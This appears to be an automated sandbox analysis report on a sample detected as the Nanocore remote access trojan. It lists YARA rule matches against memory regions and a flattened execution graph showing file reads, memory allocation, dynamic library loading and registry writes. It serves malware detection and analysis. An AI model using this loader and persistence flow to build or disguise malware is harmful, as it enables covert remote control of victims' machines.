                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        Reset < >

                          Execution Graph

                          Execution Coverage:25.2%
                          Dynamic/Decrypted Code Coverage:8.4%
                          Signature Coverage:22.4%
                          Total number of Nodes:1372
                          Total number of Limit Nodes:33
                          execution_graph 4780 401cc1 GetDlgItem GetClientRect 4781 4029e8 18 API calls 4780->4781 4782 401cf1 LoadImageA SendMessageA 4781->4782 4783 40287d 4782->4783 4784 401d0f DeleteObject 4782->4784 4784->4783 4785 401dc1 4786 4029e8 18 API calls 4785->4786 4787 401dc7 4786->4787 4788 4029e8 18 API calls 4787->4788 4789 401dd0 4788->4789 4790 4029e8 18 API calls 4789->4790 4791 401dd9 4790->4791 4792 4029e8 18 API calls 4791->4792 4793 401de2 4792->4793 4794 401423 25 API calls 4793->4794 4795 401de9 ShellExecuteA 4794->4795 4796 401e16 4795->4796 4797 401ec5 4798 4029e8 18 API calls 4797->4798 4799 401ecc GetFileVersionInfoSizeA 4798->4799 4800 401eef GlobalAlloc 4799->4800 4801 401f45 4799->4801 4800->4801 4802 401f03 GetFileVersionInfoA 4800->4802 4802->4801 4803 401f14 VerQueryValueA 4802->4803 4803->4801 4804 401f2d 4803->4804 4808 4059e3 wsprintfA 4804->4808 4806 401f39 4809 4059e3 wsprintfA 4806->4809 4808->4806 4809->4801 4810 4014ca 4811 404e23 25 API calls 4810->4811 4812 4014d1 4811->4812 4169 403f4b lstrcpynA lstrlenA 4170 40604c 4176 405ed0 4170->4176 4171 40683b 4172 405f51 GlobalFree 4173 405f5a GlobalAlloc 4172->4173 4173->4171 4173->4176 4174 405fd1 GlobalAlloc 4174->4171 4174->4176 4175 405fc8 GlobalFree 4175->4174 4176->4171 4176->4172 4176->4173 4176->4174 4176->4175 3460 401f51 3461 401f63 3460->3461 3462 402004 3460->3462 3482 4029e8 3461->3482 3465 401423 25 API calls 3462->3465 3471 40215b 3465->3471 3466 4029e8 18 API calls 3467 401f73 3466->3467 3468 401f88 LoadLibraryExA 3467->3468 3469 401f7b GetModuleHandleA 3467->3469 3468->3462 3470 401f98 GetProcAddress 3468->3470 3469->3468 3469->3470 3472 401fe5 3470->3472 3473 401fa8 3470->3473 3503 404e23 3472->3503 3475 401fb0 3473->3475 3476 401fc7 3473->3476 3500 401423 3475->3500 3488 728b115e 3476->3488 3493 728b1070 GetTempPathW 3476->3493 3477 401fb8 3477->3471 3479 401ff8 FreeLibrary 3477->3479 3479->3471 3483 4029f4 3482->3483 3514 405aa7 3483->3514 3486 401f6a 3486->3466 3489 728b1167 3488->3489 3490 728b12ad EnumResourceTypesA 3489->3490 3491 728b1173 3489->3491 3492 728b12d3 3490->3492 3491->3477 3554 728b1000 3493->3554 3496 728b1167 3497 728b12ad EnumResourceTypesA 3496->3497 3498 728b1173 3496->3498 3499 728b12d3 3497->3499 3498->3477 3501 404e23 25 API calls 3500->3501 3502 401431 3501->3502 3502->3477 3504 404e3e 3503->3504 3512 404ee1 3503->3512 3505 404e5b lstrlenA 3504->3505 3506 405aa7 18 API calls 3504->3506 3507 404e84 3505->3507 3508 404e69 lstrlenA 3505->3508 3506->3505 3510 404e97 3507->3510 3511 404e8a SetWindowTextA 3507->3511 3509 404e7b lstrcatA 3508->3509 3508->3512 3509->3507 3510->3512 3513 404e9d SendMessageA SendMessageA SendMessageA 3510->3513 3511->3510 3512->3477 3513->3512 3525 405ab4 3514->3525 3515 405cca 3516 402a15 3515->3516 3549 405a85 lstrcpynA 3515->3549 3516->3486 3533 405ce3 3516->3533 3518 405b48 GetVersion 3531 405b55 3518->3531 3519 405ca1 lstrlenA 3519->3525 3522 405aa7 10 API calls 3522->3519 3524 405bc0 GetSystemDirectoryA 3524->3531 3525->3515 3525->3518 3525->3519 3525->3522 3527 405ce3 5 API calls 3525->3527 3547 4059e3 wsprintfA 3525->3547 3548 405a85 lstrcpynA 3525->3548 3526 405bd3 GetWindowsDirectoryA 3526->3531 3527->3525 3528 405aa7 10 API calls 3528->3531 3529 405c4a lstrcatA 3529->3525 3530 405c07 SHGetSpecialFolderLocation 3530->3531 3532 405c1f SHGetPathFromIDListA CoTaskMemFree 3530->3532 3531->3524 3531->3525 3531->3526 3531->3528 3531->3529 3531->3530 3542 40596c RegOpenKeyExA 3531->3542 3532->3531 3539 405cef 3533->3539 3534 405d5b CharPrevA 3536 405d57 3534->3536 3535 405d4c CharNextA 3535->3536 3535->3539 3536->3534 3538 405d76 3536->3538 3538->3486 3539->3535 3539->3536 3540 405d3a CharNextA 3539->3540 3541 405d47 CharNextA 3539->3541 3550 4055a3 3539->3550 3540->3539 3541->3535 3543 4059dd 3542->3543 3544 40599f RegQueryValueExA 3542->3544 3543->3531 3545 4059c0 RegCloseKey 3544->3545 3545->3543 3547->3525 3548->3525 3549->3516 3551 4055a9 3550->3551 3552 4055bc 3551->3552 3553 4055af CharNextA 3551->3553 3552->3539 3553->3551 3555 728b1015 CreateFileW GetFileSize VirtualAlloc ReadFile 3554->3555 3555->3496 4813 4014d6 4814 4029cb 18 API calls 4813->4814 4815 4014dc Sleep 4814->4815 4817 40287d 4815->4817 4184 401a58 4189 4029cb 4184->4189 4186 401a5f 4187 4029cb 18 API calls 4186->4187 4188 401a68 4187->4188 4190 405aa7 18 API calls 4189->4190 4191 4029df 4190->4191 4191->4186 4192 402858 SendMessageA 4193 402872 InvalidateRect 4192->4193 4194 40287d 4192->4194 4193->4194 4818 4018d8 4819 40190f 4818->4819 4820 4029e8 18 API calls 4819->4820 4821 401914 4820->4821 4822 4053aa 68 API calls 4821->4822 4823 40191d 4822->4823 4195 402259 4196 4029e8 18 API calls 4195->4196 4197 402267 4196->4197 4198 4029e8 18 API calls 4197->4198 4199 402270 4198->4199 4200 4029e8 18 API calls 4199->4200 4201 40227a GetPrivateProfileStringA 4200->4201 4202 40155b 4203 401577 ShowWindow 4202->4203 4204 40157e 4202->4204 4203->4204 4205 40158c ShowWindow 4204->4205 4206 40287d 4204->4206 4205->4206 4824 4018db 4825 4029e8 18 API calls 4824->4825 4826 4018e2 4825->4826 4827 405346 MessageBoxIndirectA 4826->4827 4828 4018eb 4827->4828 4207 404f61 4208 404f82 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 40510d 4207->4209 4253 403e6c SendMessageA 4208->4253 4211 405116 GetDlgItem CreateThread CloseHandle 4209->4211 4212 40513e 4209->4212 4211->4212 4214 405169 4212->4214 4215 405155 ShowWindow ShowWindow 4212->4215 4216 40518b 4212->4216 4213 404ff3 4218 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 4213->4218 4217 4051c7 4214->4217 4220 4051a0 ShowWindow 4214->4220 4221 40517a 4214->4221 4258 403e6c SendMessageA 4215->4258 4262 403e9e 4216->4262 4217->4216 4227 4051d2 SendMessageA 4217->4227 4225 405069 4218->4225 4226 40504d SendMessageA SendMessageA 4218->4226 4223 4051c0 4220->4223 4224 4051b2 4220->4224 4259 403e10 4221->4259 4231 403e10 SendMessageA 4223->4231 4230 404e23 25 API calls 4224->4230 4232 40507c 4225->4232 4233 40506e SendMessageA 4225->4233 4226->4225 4229 405199 4227->4229 4234 4051eb CreatePopupMenu 4227->4234 4230->4223 4231->4217 4254 403e37 4232->4254 4233->4232 4235 405aa7 18 API calls 4234->4235 4237 4051fb AppendMenuA 4235->4237 4239 405221 4237->4239 4240 40520e GetWindowRect 4237->4240 4238 40508c 4241 405095 ShowWindow 4238->4241 4242 4050c9 GetDlgItem SendMessageA 4238->4242 4244 40522a TrackPopupMenu 4239->4244 4240->4244 4245 4050b8 4241->4245 4246 4050ab ShowWindow 4241->4246 4242->4229 4243 4050f0 SendMessageA SendMessageA 4242->4243 4243->4229 4244->4229 4247 405248 4244->4247 4257 403e6c SendMessageA 4245->4257 4246->4245 4248 405264 SendMessageA 4247->4248 4248->4248 4250 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4248->4250 4251 4052a3 SendMessageA 4250->4251 4251->4251 4252 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4251->4252 4252->4229 4253->4213 4255 405aa7 18 API calls 4254->4255 4256 403e42 SetDlgItemTextA 4255->4256 4256->4238 4257->4242 4258->4214 4260 403e17 4259->4260 4261 403e1d SendMessageA 4259->4261 4260->4261 4261->4216 4263 403eb6 GetWindowLongA 4262->4263 4264 403f3f 4262->4264 4263->4264 4265 403ec7 4263->4265 4264->4229 4266 403ed6 GetSysColor 4265->4266 4267 403ed9 4265->4267 4266->4267 4268 403ee9 SetBkMode 4267->4268 4269 403edf SetTextColor 4267->4269 4270 403f01 GetSysColor 4268->4270 4271 403f07 4268->4271 4269->4268 4270->4271 4272 403f18 4271->4272 4273 403f0e SetBkColor 4271->4273 4272->4264 4274 403f32 CreateBrushIndirect 4272->4274 4275 403f2b DeleteObject 4272->4275 4273->4272 4274->4264 4275->4274 4276 403964 4277 403ab7 4276->4277 4278 40397c 4276->4278 4280 403b08 4277->4280 4281 403ac8 GetDlgItem GetDlgItem 4277->4281 4278->4277 4279 403988 4278->4279 4282 403993 SetWindowPos 4279->4282 4283 4039a6 4279->4283 4285 403b62 4280->4285 4294 401389 2 API calls 4280->4294 4284 403e37 19 API calls 4281->4284 4282->4283 4287 4039c3 4283->4287 4288 4039ab ShowWindow 4283->4288 4289 403af2 SetClassLongA 4284->4289 4286 403e83 SendMessageA 4285->4286 4290 403ab2 4285->4290 4315 403b74 4286->4315 4291 4039e5 4287->4291 4292 4039cb DestroyWindow 4287->4292 4288->4287 4293 40140b 2 API calls 4289->4293 4296 4039ea SetWindowLongA 4291->4296 4297 4039fb 4291->4297 4343 403dc0 4292->4343 4293->4280 4295 403b3a 4294->4295 4295->4285 4298 403b3e SendMessageA 4295->4298 4296->4290 4301 403a72 4297->4301 4302 403a07 GetDlgItem 4297->4302 4298->4290 4299 40140b 2 API calls 4299->4315 4300 403dc2 DestroyWindow EndDialog 4300->4343 4303 403e9e 8 API calls 4301->4303 4305 403a37 4302->4305 4306 403a1a SendMessageA IsWindowEnabled 4302->4306 4303->4290 4304 403df1 ShowWindow 4304->4290 4308 403a44 4305->4308 4309 403a8b SendMessageA 4305->4309 4310 403a57 4305->4310 4318 403a3c 4305->4318 4306->4290 4306->4305 4307 405aa7 18 API calls 4307->4315 4308->4309 4308->4318 4309->4301 4313 403a74 4310->4313 4314 403a5f 4310->4314 4311 403e10 SendMessageA 4311->4301 4312 403e37 19 API calls 4312->4315 4317 40140b 2 API calls 4313->4317 4316 40140b 2 API calls 4314->4316 4315->4290 4315->4299 4315->4300 4315->4307 4315->4312 4319 403e37 19 API calls 4315->4319 4334 403d02 DestroyWindow 4315->4334 4316->4318 4317->4318 4318->4301 4318->4311 4320 403bef GetDlgItem 4319->4320 4321 403c04 4320->4321 4322 403c0c ShowWindow EnableWindow 4320->4322 4321->4322 4344 403e59 EnableWindow 4322->4344 4324 403c36 EnableWindow 4327 403c4a 4324->4327 4325 403c4f GetSystemMenu EnableMenuItem SendMessageA 4326 403c7f SendMessageA 4325->4326 4325->4327 4326->4327 4327->4325 4345 403e6c SendMessageA 4327->4345 4346 405a85 lstrcpynA 4327->4346 4330 403cad lstrlenA 4331 405aa7 18 API calls 4330->4331 4332 403cbe SetWindowTextA 4331->4332 4333 401389 2 API calls 4332->4333 4333->4315 4335 403d1c CreateDialogParamA 4334->4335 4334->4343 4336 403d4f 4335->4336 4335->4343 4337 403e37 19 API calls 4336->4337 4338 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4337->4338 4339 401389 2 API calls 4338->4339 4340 403da0 4339->4340 4340->4290 4341 403da8 ShowWindow 4340->4341 4342 403e83 SendMessageA 4341->4342 4342->4343 4343->4290 4343->4304 4344->4324 4345->4327 4346->4330 4347 402164 4348 4029e8 18 API calls 4347->4348 4349 40216a 4348->4349 4350 4029e8 18 API calls 4349->4350 4351 402173 4350->4351 4352 4029e8 18 API calls 4351->4352 4353 40217c 4352->4353 4354 405d7c 2 API calls 4353->4354 4355 402185 4354->4355 4356 402196 lstrlenA lstrlenA 4355->4356 4360 402189 4355->4360 4358 404e23 25 API calls 4356->4358 4357 404e23 25 API calls 4361 402191 4357->4361 4359 4021d2 SHFileOperationA 4358->4359 4359->4360 4359->4361 4360->4357 4360->4361 4829 4019e6 4830 4029e8 18 API calls 4829->4830 4831 4019ef ExpandEnvironmentStringsA 4830->4831 4832 401a03 4831->4832 4834 401a16 4831->4834 4833 401a08 lstrcmpA 4832->4833 4832->4834 4833->4834 4835 4021e6 4836 4021ed 4835->4836 4838 402200 4835->4838 4837 405aa7 18 API calls 4836->4837 4839 4021fa 4837->4839 4840 405346 MessageBoxIndirectA 4839->4840 4840->4838 4362 401c6d 4363 4029cb 18 API calls 4362->4363 4364 401c73 IsWindow 4363->4364 4365 4019d6 4364->4365 4848 4025ed 4849 4025f4 4848->4849 4850 40287d 4848->4850 4851 4025fa FindClose 4849->4851 4851->4850 4366 40266e 4367 4029e8 18 API calls 4366->4367 4369 40267c 4367->4369 4368 402692 4370 40573d 2 API calls 4368->4370 4369->4368 4371 4029e8 18 API calls 4369->4371 4372 402698 4370->4372 4371->4368 4392 40575c GetFileAttributesA CreateFileA 4372->4392 4374 4026a5 4375 4026b1 GlobalAlloc 4374->4375 4376 40274e 4374->4376 4377 402745 CloseHandle 4375->4377 4378 4026ca 4375->4378 4379 402756 DeleteFileA 4376->4379 4380 402769 4376->4380 4377->4376 4393 4031da SetFilePointer 4378->4393 4379->4380 4382 4026d0 4383 4031a8 ReadFile 4382->4383 4384 4026d9 GlobalAlloc 4383->4384 4385 4026e9 4384->4385 4386 40271d WriteFile GlobalFree 4384->4386 4388 402f01 47 API calls 4385->4388 4387 402f01 47 API calls 4386->4387 4389 402742 4387->4389 4391 4026f6 4388->4391 4389->4377 4390 402714 GlobalFree 4390->4386 4391->4390 4392->4374 4393->4382 4394 40276f 4395 4029cb 18 API calls 4394->4395 4396 402775 4395->4396 4397 4027b0 4396->4397 4398 402799 4396->4398 4405 40264e 4396->4405 4399 4027c6 4397->4399 4400 4027ba 4397->4400 4401 4027ad 4398->4401 4402 40279e 4398->4402 4404 405aa7 18 API calls 4399->4404 4403 4029cb 18 API calls 4400->4403 4409 4059e3 wsprintfA 4401->4409 4408 405a85 lstrcpynA 4402->4408 4403->4405 4404->4405 4408->4405 4409->4405 4852 4014f0 SetForegroundWindow 4853 40287d 4852->4853 4410 404772 GetDlgItem GetDlgItem 4411 4047c6 7 API calls 4410->4411 4418 4049e3 4410->4418 4412 40486c DeleteObject 4411->4412 4413 40485f SendMessageA 4411->4413 4414 404877 4412->4414 4413->4412 4416 4048ae 4414->4416 4417 405aa7 18 API calls 4414->4417 4415 404acd 4420 404b7c 4415->4420 4430 404b26 SendMessageA 4415->4430 4453 4049d6 4415->4453 4419 403e37 19 API calls 4416->4419 4421 404890 SendMessageA SendMessageA 4417->4421 4418->4415 4452 404a57 4418->4452 4463 4046f2 SendMessageA 4418->4463 4424 4048c2 4419->4424 4422 404b91 4420->4422 4423 404b85 SendMessageA 4420->4423 4421->4414 4427 404bba 4422->4427 4432 404ba3 ImageList_Destroy 4422->4432 4433 404baa 4422->4433 4423->4422 4429 403e37 19 API calls 4424->4429 4425 403e9e 8 API calls 4431 404d6c 4425->4431 4426 404abf SendMessageA 4426->4415 4434 404d20 4427->4434 4445 40140b 2 API calls 4427->4445 4457 404bec 4427->4457 4440 4048d0 4429->4440 4435 404b3b SendMessageA 4430->4435 4430->4453 4432->4433 4433->4427 4436 404bb3 GlobalFree 4433->4436 4438 404d32 ShowWindow GetDlgItem ShowWindow 4434->4438 4434->4453 4441 404b4e 4435->4441 4436->4427 4437 4049a4 GetWindowLongA SetWindowLongA 4439 4049bd 4437->4439 4438->4453 4442 4049c3 ShowWindow 4439->4442 4443 4049db 4439->4443 4440->4437 4444 40491f SendMessageA 4440->4444 4447 40499e 4440->4447 4450 40495b SendMessageA 4440->4450 4451 40496c SendMessageA 4440->4451 4446 404b5f SendMessageA 4441->4446 4461 403e6c SendMessageA 4442->4461 4462 403e6c SendMessageA 4443->4462 4444->4440 4445->4457 4446->4420 4447->4437 4447->4439 4450->4440 4451->4440 4452->4415 4452->4426 4453->4425 4454 404cf6 InvalidateRect 4454->4434 4455 404d0c 4454->4455 4468 404610 4455->4468 4456 404c1a SendMessageA 4460 404c30 4456->4460 4457->4456 4457->4460 4459 404ca4 SendMessageA SendMessageA 4459->4460 4460->4454 4460->4459 4461->4453 4462->4418 4464 404751 SendMessageA 4463->4464 4465 404715 GetMessagePos ScreenToClient SendMessageA 4463->4465 4466 404749 4464->4466 4465->4466 4467 40474e 4465->4467 4466->4452 4467->4464 4469 40462a 4468->4469 4470 405aa7 18 API calls 4469->4470 4471 40465f 4470->4471 4472 405aa7 18 API calls 4471->4472 4473 40466a 4472->4473 4474 405aa7 18 API calls 4473->4474 4475 40469b lstrlenA wsprintfA SetDlgItemTextA 4474->4475 4475->4434 4476 404d73 4477 404d81 4476->4477 4478 404d98 4476->4478 4479 404d87 4477->4479 4494 404e01 4477->4494 4480 404da6 IsWindowVisible 4478->4480 4484 404dbd 4478->4484 4481 403e83 SendMessageA 4479->4481 4483 404db3 4480->4483 4480->4494 4485 404d91 4481->4485 4482 404e07 CallWindowProcA 4482->4485 4486 4046f2 5 API calls 4483->4486 4484->4482 4495 405a85 lstrcpynA 4484->4495 4486->4484 4488 404dec 4496 4059e3 wsprintfA 4488->4496 4490 404df3 4491 40140b 2 API calls 4490->4491 4492 404dfa 4491->4492 4497 405a85 lstrcpynA 4492->4497 4494->4482 4495->4488 4496->4490 4497->4494 4498 404275 4499 4042b3 4498->4499 4500 4042a6 4498->4500 4501 4042bc GetDlgItem 4499->4501 4509 40431f 4499->4509 4559 40532a GetDlgItemTextA 4500->4559 4505 4042d0 4501->4505 4503 4042ad 4504 405ce3 5 API calls 4503->4504 4504->4499 4507 4042e4 SetWindowTextA 4505->4507 4512 40560c 4 API calls 4505->4512 4506 404403 4508 40458f 4506->4508 4561 40532a GetDlgItemTextA 4506->4561 4513 403e37 19 API calls 4507->4513 4511 403e9e 8 API calls 4508->4511 4509->4506 4509->4508 4514 405aa7 18 API calls 4509->4514 4516 4045a3 4511->4516 4517 4042da 4512->4517 4518 404302 4513->4518 4519 404395 SHBrowseForFolderA 4514->4519 4515 40442f 4520 405659 18 API calls 4515->4520 4517->4507 4524 405578 3 API calls 4517->4524 4521 403e37 19 API calls 4518->4521 4519->4506 4522 4043ad CoTaskMemFree 4519->4522 4523 404435 4520->4523 4525 404310 4521->4525 4526 405578 3 API calls 4522->4526 4562 405a85 lstrcpynA 4523->4562 4524->4507 4560 403e6c SendMessageA 4525->4560 4528 4043ba 4526->4528 4531 4043f1 SetDlgItemTextA 4528->4531 4535 405aa7 18 API calls 4528->4535 4530 404318 4533 405da3 3 API calls 4530->4533 4531->4506 4532 40444c 4534 405da3 3 API calls 4532->4534 4533->4509 4542 404454 4534->4542 4536 4043d9 lstrcmpiA 4535->4536 4536->4531 4539 4043ea lstrcatA 4536->4539 4537 40448e 4563 405a85 lstrcpynA 4537->4563 4539->4531 4540 404497 4541 40560c 4 API calls 4540->4541 4543 40449d GetDiskFreeSpaceA 4541->4543 4542->4537 4546 4055bf 2 API calls 4542->4546 4547 4044e1 4542->4547 4545 4044bf MulDiv 4543->4545 4543->4547 4545->4547 4546->4542 4548 40453e 4547->4548 4549 404610 21 API calls 4547->4549 4550 404561 4548->4550 4552 40140b 2 API calls 4548->4552 4551 404530 4549->4551 4564 403e59 EnableWindow 4550->4564 4553 404540 SetDlgItemTextA 4551->4553 4554 404535 4551->4554 4552->4550 4553->4548 4556 404610 21 API calls 4554->4556 4556->4548 4557 40457d 4557->4508 4565 40420a 4557->4565 4559->4503 4560->4530 4561->4515 4562->4532 4563->4540 4564->4557 4566 404218 4565->4566 4567 40421d SendMessageA 4565->4567 4566->4567 4567->4508 4854 4022f5 4855 4022fb 4854->4855 4856 4029e8 18 API calls 4855->4856 4857 40230d 4856->4857 4858 4029e8 18 API calls 4857->4858 4859 402317 RegCreateKeyExA 4858->4859 4860 402341 4859->4860 4862 40287d 4859->4862 4861 4029e8 18 API calls 4860->4861 4864 402359 4860->4864 4866 402352 lstrlenA 4861->4866 4863 402365 4865 402380 RegSetValueExA 4863->4865 4868 402f01 47 API calls 4863->4868 4864->4863 4867 4029cb 18 API calls 4864->4867 4869 402396 RegCloseKey 4865->4869 4866->4864 4867->4863 4868->4865 4869->4862 4871 4027f5 4872 4029cb 18 API calls 4871->4872 4873 4027fb 4872->4873 4874 40282c 4873->4874 4875 40264e 4873->4875 4877 402809 4873->4877 4874->4875 4876 405aa7 18 API calls 4874->4876 4876->4875 4877->4875 4879 4059e3 wsprintfA 4877->4879 4879->4875 4880 4024f8 4881 4029cb 18 API calls 4880->4881 4884 402502 4881->4884 4882 402578 4883 402536 ReadFile 4883->4882 4883->4884 4884->4882 4884->4883 4885 40257a 4884->4885 4886 40258a 4884->4886 4889 4059e3 wsprintfA 4885->4889 4886->4882 4888 4025a0 SetFilePointer 4886->4888 4888->4882 4889->4882 4890 4016fa 4891 4029e8 18 API calls 4890->4891 4892 401701 SearchPathA 4891->4892 4893 40171c 4892->4893 4894 4014fe 4895 401506 4894->4895 4897 401519 4894->4897 4896 4029cb 18 API calls 4895->4896 4896->4897 4568 403f7f 4569 403f95 4568->4569 4574 4040a2 4568->4574 4572 403e37 19 API calls 4569->4572 4570 404111 4571 4041e5 4570->4571 4573 40411b GetDlgItem 4570->4573 4579 403e9e 8 API calls 4571->4579 4575 403feb 4572->4575 4576 404131 4573->4576 4577 4041a3 4573->4577 4574->4570 4574->4571 4578 4040e6 GetDlgItem SendMessageA 4574->4578 4580 403e37 19 API calls 4575->4580 4576->4577 4584 404157 6 API calls 4576->4584 4577->4571 4581 4041b5 4577->4581 4599 403e59 EnableWindow 4578->4599 4589 4041e0 4579->4589 4583 403ff8 CheckDlgButton 4580->4583 4585 4041bb SendMessageA 4581->4585 4586 4041cc 4581->4586 4597 403e59 EnableWindow 4583->4597 4584->4577 4585->4586 4586->4589 4590 4041d2 SendMessageA 4586->4590 4587 40410c 4591 40420a SendMessageA 4587->4591 4590->4589 4591->4570 4592 404016 GetDlgItem 4598 403e6c SendMessageA 4592->4598 4594 40402c SendMessageA 4595 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4594->4595 4596 40404a GetSysColor 4594->4596 4595->4589 4596->4595 4597->4592 4598->4594 4599->4587 4600 401000 4601 401037 BeginPaint GetClientRect 4600->4601 4602 40100c DefWindowProcA 4600->4602 4604 4010f3 4601->4604 4605 401179 4602->4605 4606 401073 CreateBrushIndirect FillRect DeleteObject 4604->4606 4607 4010fc 4604->4607 4606->4604 4608 401102 CreateFontIndirectA 4607->4608 4609 401167 EndPaint 4607->4609 4608->4609 4610 401112 6 API calls 4608->4610 4609->4605 4610->4609 4611 401b06 4612 401b13 4611->4612 4613 401b57 4611->4613 4616 4021ed 4612->4616 4621 401b2a 4612->4621 4614 401b80 GlobalAlloc 4613->4614 4615 401b5b 4613->4615 4617 405aa7 18 API calls 4614->4617 4629 401b9b 4615->4629 4632 405a85 lstrcpynA 4615->4632 4618 405aa7 18 API calls 4616->4618 4617->4629 4620 4021fa 4618->4620 4625 405346 MessageBoxIndirectA 4620->4625 4630 405a85 lstrcpynA 4621->4630 4622 401b6d GlobalFree 4622->4629 4624 401b39 4631 405a85 lstrcpynA 4624->4631 4625->4629 4627 401b48 4633 405a85 lstrcpynA 4627->4633 4630->4624 4631->4627 4632->4622 4633->4629 4019 21a07dd 4033 21a06c7 GetPEB 4019->4033 4021 21a0842 4022 21a0abf CreateFileW 4021->4022 4023 21a0aec 4022->4023 4026 21a0ae7 4022->4026 4024 21a0b02 VirtualAlloc 4023->4024 4023->4026 4025 21a0b1f ReadFile 4024->4025 4024->4026 4025->4026 4027 21a0b3d FindCloseChangeNotification 4025->4027 4028 21a0b51 4027->4028 4034 21a1597 4028->4034 4033->4021 4059 21a06c7 GetPEB 4034->4059 4036 21a184c 4037 21a0b65 4036->4037 4060 21a1ad7 4036->4060 4045 21a0fa7 4037->4045 4041 21a1a3f 4041->4037 4042 21a1a4a RegGetValueW 4041->4042 4042->4037 4043 21a1a77 RegOpenKeyExW 4042->4043 4043->4041 4044 21a1a9f RegSetValueExW 4043->4044 4044->4037 4078 21a06c7 GetPEB 4045->4078 4047 21a0ffe 4048 21a10e9 4047->4048 4050 21a10f6 4047->4050 4058 21a0b6d ExitProcess 4047->4058 4079 21a12cf 4048->4079 4050->4058 4100 21a0267 4050->4100 4052 21a1269 4055 21a0267 11 API calls 4052->4055 4053 21a11fc 4053->4052 4054 21a0267 11 API calls 4053->4054 4053->4058 4054->4053 4056 21a1288 4055->4056 4056->4058 4109 21a01b6 